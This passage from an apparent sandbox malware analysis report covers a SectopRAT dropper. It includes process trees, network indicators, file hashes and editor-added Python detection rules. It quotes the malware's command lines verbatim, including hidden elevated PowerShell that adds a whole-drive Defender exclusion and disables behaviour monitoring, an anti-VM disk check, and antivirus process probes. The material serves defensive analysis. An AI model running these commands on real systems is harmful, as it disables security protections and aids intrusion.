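    r"PID 4504 wrote to memory of 3220 N/A {T}\{Z}.exe {T}\is-UB4L5.tmp\{Z}.tmp",
    r"PID 3220 wrote to memory of 568 N/A {T}\is-UB4L5.tmp\{Z}.tmp {W}\system32\cmd.exe",
    r"PID 568 wrote to memory of 1304 N/A {W}\system32\cmd.exe {W}\system32\tasklist.exe",
    r"PID 2404 set thread context of 3800 N/A C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe {W}\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
]]

ROW_RE = re.compile(r"^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(rows):
    """Unique (kind, parent, child) edges in first-seen order. A process is (pid, image path):
    Windows recycles PIDs, and in this run 568 and 3252 each name two different processes."""
    edges = {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue                      # tolerate rows copied from other signature tables
        kind = "inject" if m.group(2).startswith("set thread") else "spawn"
        edges[(kind, (int(m.group(1)), m.group(4)), (int(m.group(3)), m.group(5)))] = None
    return list(edges)


def build_tree(edges):
    """children[node] -> [(child_node, kind)], with every node present as a key."""
    children = {}
    for kind, parent, child in edges:
        children.setdefault(parent, []).append((child, kind))
        children.setdefault(child, [])
    return children


def roots(children):
    as_child = {c for kids in children.values() for c, _ in kids}
    return [n for n in children if n not in as_child]


def lineage(children, node):
    """Image basenames from the root down to `node`."""
    parent_of = {c: p for p, kids in children.items() for c, _ in kids}
    chain = [node]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return [basename(n[1]) for n in reversed(chain)]


def injections(edges):
    return [(basename(p[1]), basename(c[1])) for kind, p, c in edges if kind == "inject"]


def render(children, node, depth=0, kind="spawn", out=None):
    """Indented text tree; a thread-context edge is marked so the hollowed host stands out."""
    out = [] if out is None else out
    tag = "<inject> " if kind == "inject" else ""
    out.append("  " * depth + f"{tag}{basename(node[1])} [{node[0]}]")
    for child, k in children[node]:
        render(children, child, depth + 1, k, out)
    return out


def render_all(children):
    lines = []
    for root in roots(children):
        render(children, root, out=lines)
    return lines


if __name__ == "__main__":
    tree = build_tree(parse_rows(REPORT_ROWS))
    print("\n".join(render_all(tree)))
```

Run as a script it prints three trees: the sample's own chain down to the two PowerShell processes, the explorer.exe chain that re-launches the second installer with /VERYSILENT and its tasklist checks, and AutoIt3.exe with MSBuild.exe hanging off it as an injection edge. The same parser works on the full 64-row table; only the constructed subset was trimmed to keep the example short.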

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp" /SL5="$5030A,4595545,205824,C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c wmic diskdrive get model | FINDSTR /I "Virtual VBOX VMware">ds.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get model

C:\Windows\system32\findstr.exe

FINDSTR /I "Virtual VBOX VMware"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c interim.cmd

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Windows\system32\cmd.exe

cmd /c tar xf interim

C:\Windows\system32\tar.exe

tar xf interim

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

".\231\231.exe"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

"C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe"

C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp" /SL5="$8030A,10740751,812544,C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe"

C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe

"C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe" /VERYSILENT /NORESTART

C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp" /SL5="$9030A,10740751,812544,C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe" /VERYSILENT /NORESTART

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "wrsa.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "opssvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avastui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avgui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "nswscsvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "sophoshealth.exe"

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

"C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && AutoIt3.exe C:\ProgramData\\9TjdUm.a3x && del C:\ProgramData\\9TjdUm.a3x

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

AutoIt3.exe C:\ProgramData\\9TjdUm.a3x

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
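
Read top to bottom, the command lines above give the whole chain of behavioral2: the sample is an Inno Setup installer (the is-UEAQJ.tmp stage started with /SL5=), which checks the disk model through WMIC for VirtualBox/VMware strings, unpacks a tar archive into %TEMP%\msdtadmin and hides that directory with attrib +s +h, runs 231.exe on a bundled JRE (a JPHP/DevelNext application, judging by the classpath and the FXLauncher main class), uses two hidden, RunAs-elevated PowerShell processes to add a Defender exclusion for the whole C: drive and to disable behaviour monitoring, launches a second Inno Setup installer through explorer.exe with /VERYSILENT, looks for security products with tasklist (wrsa, opssvc, avastui, avgui, nswscsvc, sophoshealth), and finally runs compiled AutoIt scripts (.a3x) from %LOCALAPPDATA%\acetiam and C:\ProgramData after a ping-based delay; AutoIt3.exe is the process that writes the RunOnce key and manipulates the thread context of MSBuild.exe. The Python below is an added example (editor's code, not sandbox output and not the malware's own): it turns that reading into regex rules over single command lines, as an EDR or Sysmon Event ID 1 CommandLine field would supply them, decodes the /SL5 argument, and reports the Defender exclusion paths, flagging a bare drive root. The input is the command lines copied from this list; the rule names, and the reading of the two /SL5 numbers as the setup-0.bin and setup-1.bin offsets inside the original installer, are the editor's.

```python
"""Behaviour tagging of the behavioral2 command lines (added example, not sandbox output)."""
import re

# Constructed input: command lines copied from the "Processes" list of this report.
REPORT_CMDLINES = r'''
"C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp" /SL5="$5030A,4595545,205824,C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"
"C:\Windows\system32\cmd.exe" cmd /c wmic diskdrive get model | FINDSTR /I "Virtual VBOX VMware">ds.txt
attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"
tar xf interim
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"
Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"
explorer C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && AutoIt3.exe C:\ProgramData\\9TjdUm.a3x && del C:\ProgramData\\9TjdUm.a3x
"C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"
'''.strip().splitlines()

# (tag, pattern) pairs, each matched case-insensitively against one command line.
RULES = [(tag, re.compile(pat, re.IGNORECASE)) for tag, pat in (
    ("inno_setup_stage2",          r'/SL5="\$[0-9A-F]+,\d+,\d+,'),
    ("anti_vm_disk_model_check",   r'wmic\s+diskdrive\s+get\s+model.*findstr.*(virtual|vbox|vmware)'),
    ("hide_dropped_directory",     r'\battrib\b.*\+h\b'),
    ("tar_unpack_payload",         r'\btar\s+xf\b'),
    ("defender_add_exclusion",     r'Add-MpPreference\b.*-ExclusionPath'),
    ("defender_disable_behaviour", r'Set-MpPreference\b.*-DisableBehaviorMonitoring'),
    ("hidden_elevated_powershell", r'Start-Process\s+Powershell(\.exe)?.*-WindowStyle\s+hidden.*-Verb\s+RunAs'),
    ("av_process_discovery",       r'tasklist\s+/FI\s+"IMAGENAME eq [^"]+"'),
    ("ping_delay_then_execute",    r'ping\s+-n\s+\d+\s+127\.0\.0\.1\s*>\s*nul\s*&&'),
    ("autoit_compiled_script",     r'AutoIt3\.exe.*\.a3x\b'),
    ("explorer_proxy_launch",      r'^explorer\s+\S+\.exe$'),
)]
SL5_RE = re.compile(r'/SL5="\$([0-9A-F]+),(\d+),(\d+),([^"]+)"', re.IGNORECASE)
EXCL_RE = re.compile(r'-ExclusionPath\s+"?([A-Z]:[^"\s]*)', re.IGNORECASE)
AV_RE = re.compile(r'IMAGENAME eq ([^"]+)"', re.IGNORECASE)


def classify(cmdline):
    """Tags a single command line triggers, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def parse_sl5(cmdline):
    """Decode the Inno Setup SetupLdr hand-off: hex window handle, two offsets into the
    original installer (assumed here to be setup-0.bin and setup-1.bin), and its path."""
    m = SL5_RE.search(cmdline)
    if not m:
        return None
    return {"hwnd": int(m.group(1), 16), "setup0_offset": int(m.group(2)),
            "setup1_offset": int(m.group(3)), "installer": m.group(4)}


def exclusion_paths(cmdlines):
    """Every path handed to Add-MpPreference -ExclusionPath, normalised to end in a backslash
    (the two variants above quote C:\ differently and one drops the backslash)."""
    paths = set()
    for c in cmdlines:
        for p in EXCL_RE.findall(c):
            paths.add(p if p.endswith("\\") else p + "\\")
    return sorted(paths)


def whole_drive_excluded(paths):
    """True if an exclusion is a bare drive root, which blinds Defender to the whole volume."""
    return any(re.fullmatch(r"[A-Za-z]:\\", p) for p in paths)


def av_targets(cmdlines):
    """Process names the dropper probes with tasklist /FI "IMAGENAME eq ...": its AV/EDR list."""
    return sorted({m.lower() for c in cmdlines for m in AV_RE.findall(c)})


def summarize(cmdlines):
    tags, stage2 = {}, None
    for c in cmdlines:
        for t in classify(c):
            tags[t] = tags.get(t, 0) + 1
        stage2 = stage2 or parse_sl5(c)
    excl = exclusion_paths(cmdlines)
    return {"tags": tags, "av_targets": av_targets(cmdlines), "exclusion_paths": excl,
            "whole_drive_excluded": whole_drive_excluded(excl),
            "stage2_installer": stage2["installer"] if stage2 else None}


if __name__ == "__main__":
    for key, value in summarize(REPORT_CMDLINES).items():
        print(f"{key}: {value}")
```

On real telemetry, feed the CommandLine field of each process-creation event to classify() and alert on defender_disable_behaviour or on whole_drive_excluded() returning True; a Defender exclusion for C:\ is not something legitimate software asks for, and the two Set-MpPreference/Add-MpPreference forms seen here (one wrapped in Start-Process -Verb RunAs, one plain) show why the rule should match the cmdlet rather than the outer shell invocation.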

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | t.me | udp
NL | 149.154.167.99:443 | t.me | tcp
DE | 78.47.101.48:80 | 78.47.101.48 | tcp
US | 8.8.8.8:53 | 48.101.47.78.in-addr.arpa | udp
RU | 89.23.96.126:80 | 89.23.96.126 | tcp
NL | 149.154.167.99:443 | t.me | tcp
RU | 89.23.96.126:80 | 89.23.96.126 | tcp
DE | 78.47.101.48:443 | 78.47.101.48 | tcp
RU | 89.23.96.126:80 | 89.23.96.126 | tcp
RU | 89.23.96.126:80 | 89.23.96.126 | tcp
RU | 45.141.86.82:15647 | | tcp
RU | 45.141.86.82:9000 | 45.141.86.82 | tcp

Files

memory/2588-0-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2588-2-0x0000000000401000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

MD5 2e5268d21ee1d98eccf3b34eec423da1
SHA1 8a2438cd614bb41e25840bd2d4093624340340c1
SHA256 16eb4e42a9368653bd9d53fe8bde815fe87c597239f36b662cc96dbc007200b7
SHA512 aad98865430deca874beff456d349e640caaf9969726f1b279995d4eff41efd77e422c43e739af245f7e7ab5e6f970b4b10a8ef40681621a419b533da002fe94

C:\Users\Admin\AppData\Local\Temp\is-FKM89.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/3748-11-0x0000000000400000-0x0000000000588000-memory.dmp

memory/2588-31-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3748-32-0x0000000000400000-0x0000000000588000-memory.dmp

memory/3748-33-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\interim.cmd

MD5 5eb56a3d2bf812380982b715d6c76e4b
SHA1 42e24481c1f1dd3f18d8396eec6570e2c05d17ce
SHA256 9008812fe85e22ae3e3c394568d449cb78d252a403c4950ed181007542acd23c
SHA512 8d21ab65128c9070d0f31a91561f65d3c3eb6d9c36d2ff73f7b80e4de63a18d14c8512d58da565919f95cd594e2df45762153ae216bc6cd1cefd53a8dd005cf2

memory/3748-276-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

MD5 0f2614f9e5ce56e869691391776aae9e
SHA1 858e326195413db11adc894f10d16a2bd087ecef
SHA256 44dbf9913a950bfea77e8fceb3c15b802733a6a6c7942f6b6ee05d17afba521a
SHA512 80d7233a64d69c474bf8b46728801396c97c9089c64b26218d5bfad096cc39dbe9f67bf942aecbe721b5dc345bd99968b39da4fc20cd006c75c258cc2ec38de7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\java.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\meta-index

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\zip.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\verify.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\meta-index

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\asm-all.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\activation.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-jfoenix-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\jfxrt.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-runtime.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-mail-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-jsoup-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-json-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-hotkey-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-core.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-app-framework.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jna.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jkeymaster.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jfoenix.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\gson.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-php-sdk.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-compiled-module.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\commons-email.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-systemtray-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-xml-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zend-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zip-ext.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jsoup.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\mail.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\currency.data

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-api.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\slf4j-simple.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\zt-zip.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\security\java.security

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\jsse.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\net.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\nio.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzdb.dat

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\tzmappings

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\resources.jar

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr120.dll

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcp120.dll

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2n1mq5ad.1bm.ps1

C:\Users\Admin\AppData\Local\Temp\is-OAJ1K.tmp\_isetup\_iscrypt.dll

C:\Users\Admin\AppData\Local\Temp\tmpF68D.tmp

C:\Users\Admin\AppData\Local\Temp\tmpF6B0.tmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-04 20:12

Reported

2024-09-04 20:15

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Downloads MZ/PE file

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp N/A

Adds Run key to start application

persistence
Description Indicator Process Target
